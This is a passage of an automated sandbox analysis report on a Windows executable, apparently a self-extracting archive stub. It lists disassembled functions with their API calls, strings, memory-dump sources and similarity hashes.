                                                                                                                                                      • Opcode Fuzzy Hash: eb72265073226e2a24c1193aba293bef0ae78229f53beb37900642c803e89ad0
                                                                                                                                                      • Instruction Fuzzy Hash: 9F01477E238312AEA6246FF87ED555B27A8EBD13767310339F120550E9EF614C12D341
                                                                                                                                                      Function 00A50005 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(?,?,00A4B581,?,00A6E088,?,00A4AE80,?,00A6E088,?,00000007), ref: 00A50009
                                                                                                                                                      • _free.LIBCMT ref: 00A5003C
                                                                                                                                                      • _free.LIBCMT ref: 00A50064
                                                                                                                                                      • SetLastError.KERNEL32(00000000,00A6E088,?,00000007), ref: 00A50071
                                                                                                                                                      • SetLastError.KERNEL32(00000000,00A6E088,?,00000007), ref: 00A5007D
                                                                                                                                                      • _abort.LIBCMT ref: 00A50083
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                      • Opcode ID: 3ecd4ee2e69e1f914a4066d0c2e0f64207ae422220262b361d744ac5a60aced2
                                                                                                                                                      • Instruction ID: 67bf3bf3299a076255199014a02a25eaf8c757f1668b0cf6d4a0d43de3ad0877
                                                                                                                                                      • Opcode Fuzzy Hash: 3ecd4ee2e69e1f914a4066d0c2e0f64207ae422220262b361d744ac5a60aced2
                                                                                                                                                      • Instruction Fuzzy Hash: 3BF04436104700ABC62273B46E46F6B2A79BBC1773F260114FD19A61D2EE75884E9214
                                                                                                                                                      Function 00A43FCF Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A43FDB
                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A43FF5
                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A44006
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00A44010
                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00A4401A
                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A44025
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2148572870-0
                                                                                                                                                      • Opcode ID: 28f040de2dfe7c53b4e1865bdd45d82b67ca630e28dd9cb26014cddde2992c35
                                                                                                                                                      • Instruction ID: 4d1995f64106e7e6f32add1325248c7c687741c4d6b0329106ce4515154f8010
                                                                                                                                                      • Opcode Fuzzy Hash: 28f040de2dfe7c53b4e1865bdd45d82b67ca630e28dd9cb26014cddde2992c35
                                                                                                                                                      • Instruction Fuzzy Hash: 0AF0F472901219BBCB20ABE5EC4DEDF7F6DFF95751B008011F60AD1054D6749547C7A0
                                                                                                                                                      Function 00A42493 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,00000066), ref: 00A426A9
                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,00A75380), ref: 00A426D6
                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A42702
                                                                                                                                                      Strings
                                                                                                                                                      • ProgramFilesDir, xrefs: 00A425E0
                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 00A425F4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Item
                                                                                                                                                      • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                      • API String ID: 3888421826-2634093826
                                                                                                                                                      • Opcode ID: c4fd2a35b85217098795e4a809c496fa070934578bd27c07b27920603167d4da
                                                                                                                                                      • Instruction ID: fb405fb460c47862ed29c53ff65c73a3ca2e41b1113f51cc63eb90dda9f414ff
                                                                                                                                                      • Opcode Fuzzy Hash: c4fd2a35b85217098795e4a809c496fa070934578bd27c07b27920603167d4da
                                                                                                                                                      • Instruction Fuzzy Hash: 86818D35D002589ECF24EBE4DDA1FEDB7B8AF58300F844069E509B7191DB746B89CB60
                                                                                                                                                      Function 00A3DC95 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$H_prolog3
                                                                                                                                                      • String ID: &nbsp;$<br>
                                                                                                                                                      • API String ID: 1035939448-26742755
                                                                                                                                                      • Opcode ID: 8f61ad8baaec19c85108dec0ac9d9e4426c5d1882c54d1bfd4a3b1052e82fd7a
                                                                                                                                                      • Instruction ID: 2c3e087d365e58f95ffc64d206d4eba90e496ca29e6eee41ebb74ff31a928107
                                                                                                                                                      • Opcode Fuzzy Hash: 8f61ad8baaec19c85108dec0ac9d9e4426c5d1882c54d1bfd4a3b1052e82fd7a
                                                                                                                                                      • Instruction Fuzzy Hash: 7A413E30B01211EBDB259F54E98163D7332FBA5784F608429F4029F281EBB19992C7D1
                                                                                                                                                      Function 00A4EE2A Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\M1Y6kc9FpE.exe,00000104), ref: 00A4EE6A
                                                                                                                                                      • _free.LIBCMT ref: 00A4EF35
                                                                                                                                                      • _free.LIBCMT ref: 00A4EF3F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                      • String ID: C:\Users\user\Desktop\M1Y6kc9FpE.exe$`&C
                                                                                                                                                      • API String ID: 2506810119-2212709020
                                                                                                                                                      • Opcode ID: f85be4c4afaa9b297e08886289a4da444218baecd11b65808f51a87c764a4a6b
                                                                                                                                                      • Instruction ID: 715b1e5c4c4b40546c1b04232a57ab9c133291c6e311997b5af165a1ad8a5d74
                                                                                                                                                      • Opcode Fuzzy Hash: f85be4c4afaa9b297e08886289a4da444218baecd11b65808f51a87c764a4a6b
                                                                                                                                                      • Instruction Fuzzy Hash: E4317C75A04258AFCB25DB999D82A9EBBF8FBC5311F144066F80497201D7709E45CB91
                                                                                                                                                      Function 00A43EFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A43F03
                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00A43F1B
                                                                                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00A43F86
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnvironmentVariable$H_prolog3_
                                                                                                                                                      • String ID: sfxcmd$sfxpar
                                                                                                                                                      • API String ID: 3605364767-3493335439
                                                                                                                                                      • Opcode ID: 4166195ad1ad48b41ab4bd525ad2264118ec195d5b2c7444fd204adddb91b144
                                                                                                                                                      • Instruction ID: a42491de309b95ee16d8abac52ac675b9b5adcaf273fcc334669a238887cd42c
                                                                                                                                                      • Opcode Fuzzy Hash: 4166195ad1ad48b41ab4bd525ad2264118ec195d5b2c7444fd204adddb91b144
                                                                                                                                                      • Instruction Fuzzy Hash: B9212875D10218EFCF18DFA8DA859EDB7F9FB48301B10442AF441AB241DB31AA48CB64
                                                                                                                                                      Function 00A407E5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LoadBitmapW.USER32(00000065), ref: 00A407F5
                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00A4081A
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00A4084C
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00A4086F
                                                                                                                                                        • Part of subcall function 00A3EBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00A40845,00000066), ref: 00A3EBE6
                                                                                                                                                        • Part of subcall function 00A3EBD3: SizeofResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EBFD
                                                                                                                                                        • Part of subcall function 00A3EBD3: LoadResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EC14
                                                                                                                                                        • Part of subcall function 00A3EBD3: LockResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EC23
                                                                                                                                                        • Part of subcall function 00A3EBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A40845,00000066), ref: 00A3EC3E
                                                                                                                                                        • Part of subcall function 00A3EBD3: GlobalLock.KERNEL32(00000000), ref: 00A3EC4F
                                                                                                                                                        • Part of subcall function 00A3EBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00A3EC73
                                                                                                                                                        • Part of subcall function 00A3EBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A3ECB8
                                                                                                                                                        • Part of subcall function 00A3EBD3: GlobalUnlock.KERNEL32(00000000), ref: 00A3ECD7
                                                                                                                                                        • Part of subcall function 00A3EBD3: GlobalFree.KERNEL32(00000000), ref: 00A3ECDE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                      • String ID: ]
                                                                                                                                                      • API String ID: 1797374341-3352871620
                                                                                                                                                      • Opcode ID: cd25da06b42ae6ef7f9e42aed1208ea5f4fb9adcb63d2f9cde965e765176ddaf
                                                                                                                                                      • Instruction ID: 66b46bc763d99687395b2c42c40ec654860dfffe92c0ae2b80b999349b7dbb81
                                                                                                                                                      • Opcode Fuzzy Hash: cd25da06b42ae6ef7f9e42aed1208ea5f4fb9adcb63d2f9cde965e765176ddaf
                                                                                                                                                      • Instruction Fuzzy Hash: B101B53A940219A7DB11EBA49E09E7F7A7AAFC0B56F050024FA05E72D1DF71CC0696F1
                                                                                                                                                      Function 00A4ED2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A4ECE0,00000000,?,00A4EC80,00000000,00A66F40,0000000C,00A4EDD7,00000000,00000002), ref: 00A4ED4F
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A4ED62
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00A4ECE0,00000000,?,00A4EC80,00000000,00A66F40,0000000C,00A4EDD7,00000000,00000002), ref: 00A4ED85
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                      • Opcode ID: 71db04a5c2f8444e91b951557401012d0c6fe6b4f517e41e547997f3e9006c2b
                                                                                                                                                      • Instruction ID: 89ed8d0af9f489449e59f501b86739cb70e0f343b732ce4162c2228a8f5c1e44
                                                                                                                                                      • Opcode Fuzzy Hash: 71db04a5c2f8444e91b951557401012d0c6fe6b4f517e41e547997f3e9006c2b
                                                                                                                                                      • Instruction Fuzzy Hash: 5EF01D74A10708FFCB11EBA4DC09B9EBAB5FB44726F000168A805A6150DA744945CA90
                                                                                                                                                      Function 00A35094 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A36C5E: __EH_prolog3_GS.LIBCMT ref: 00A36C65
                                                                                                                                                        • Part of subcall function 00A36C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00A36C9A
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A350B3
                                                                                                                                                      • GetProcAddress.KERNEL32(00A751F8,CryptUnprotectMemory), ref: 00A350C3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$DirectoryH_prolog3_System
                                                                                                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                      • API String ID: 270589589-1753850145
                                                                                                                                                      • Opcode ID: 237003cde6174b2fd0e7b8fa2e9921cd2433b59ae7d4d9e1f1119ff047d9bc86
                                                                                                                                                      • Instruction ID: eb2e6a08b700d62f90a35e8eeb34acdb8f42fb1c97f72434a248c87f6b012922
                                                                                                                                                      • Opcode Fuzzy Hash: 237003cde6174b2fd0e7b8fa2e9921cd2433b59ae7d4d9e1f1119ff047d9bc86
                                                                                                                                                      • Instruction Fuzzy Hash: 84E04F71810711EED7309B78DC087467EE4BF05B26F00C82DB8D9D3585D6B5E4448B50
                                                                                                                                                      Function 00A4985A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AdjustPointer$_abort
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2252061734-0
                                                                                                                                                      • Opcode ID: bd89f28627153fdf01ad59e750b68915d8690a110f75b4fcb8a73de18ccd07f4
                                                                                                                                                      • Instruction ID: abef595561499be1495e6969d5db5a1a36b7429adae5c312ec77c0d9558d64ac
                                                                                                                                                      • Opcode Fuzzy Hash: bd89f28627153fdf01ad59e750b68915d8690a110f75b4fcb8a73de18ccd07f4
                                                                                                                                                      • Instruction Fuzzy Hash: A851E27AA01202AFDB289F54C941BABB3B4FFC4310F14452DE805472A2E731ECA4C791
                                                                                                                                                      Function 00A2F3BE Relevance: 7.7, APIs: 5, Instructions: 161filetimeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2F3C5
                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,00A2B749,?,?,?,?,?,?), ref: 00A2F450
                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 00A2F4A7
                                                                                                                                                      • SetFileTime.KERNEL32(?,?,?,?), ref: 00A2F569
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00A2F570
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Create$CloseH_prolog3_HandleTime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4002707884-0
                                                                                                                                                      • Opcode ID: 49a6e0bf1d42f18f6cbd157b548dae918b4057d125877fb0dcfd1649daa79a0b
                                                                                                                                                      • Instruction ID: 9563a90c1adb95f76a5623ba257aa45cfea51ce0977cd1a87c9c07c928f256c8
                                                                                                                                                      • Opcode Fuzzy Hash: 49a6e0bf1d42f18f6cbd157b548dae918b4057d125877fb0dcfd1649daa79a0b
                                                                                                                                                      • Instruction Fuzzy Hash: D9517E70904258AEEF25EFE8E985BEEBBB5AF48314F240139F451F7280D7749A45CB24
                                                                                                                                                      Function 00A52BE0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00A52BE9
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A52C0C
                                                                                                                                                        • Part of subcall function 00A5040E: RtlAllocateHeap.NTDLL(00000000,00A4535E,?,?,00A46C16,?,?,?,?,?,00A45269,00A4535E,?,?,?,?), ref: 00A50440
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A52C32
                                                                                                                                                      • _free.LIBCMT ref: 00A52C45
                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A52C54
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                      • Opcode ID: fbf6ea2d2d691b3d8466ed97b05bcbef481e46107d5d218066ead4326da9cd7c
                                                                                                                                                      • Instruction ID: b5c2a86efebf795fd8dfc3f4818d91c0932740a32b5a563d562ec1d0dd62e160
                                                                                                                                                      • Opcode Fuzzy Hash: fbf6ea2d2d691b3d8466ed97b05bcbef481e46107d5d218066ead4326da9cd7c
                                                                                                                                                      • Instruction Fuzzy Hash: 4201DF726017107F63256BA66C88E7F6A6DFFC7BB33150228BD04D6216EE708C0692F0
                                                                                                                                                      Function 00A50089 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(00A4535E,00A4535E,?,00A501D8,00A50451,?,?,00A46C16,?,?,?,?,?,00A45269,00A4535E,?), ref: 00A5008E
                                                                                                                                                      • _free.LIBCMT ref: 00A500C3
                                                                                                                                                      • _free.LIBCMT ref: 00A500EA
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00A4535E), ref: 00A500F7
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00A4535E), ref: 00A50100
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
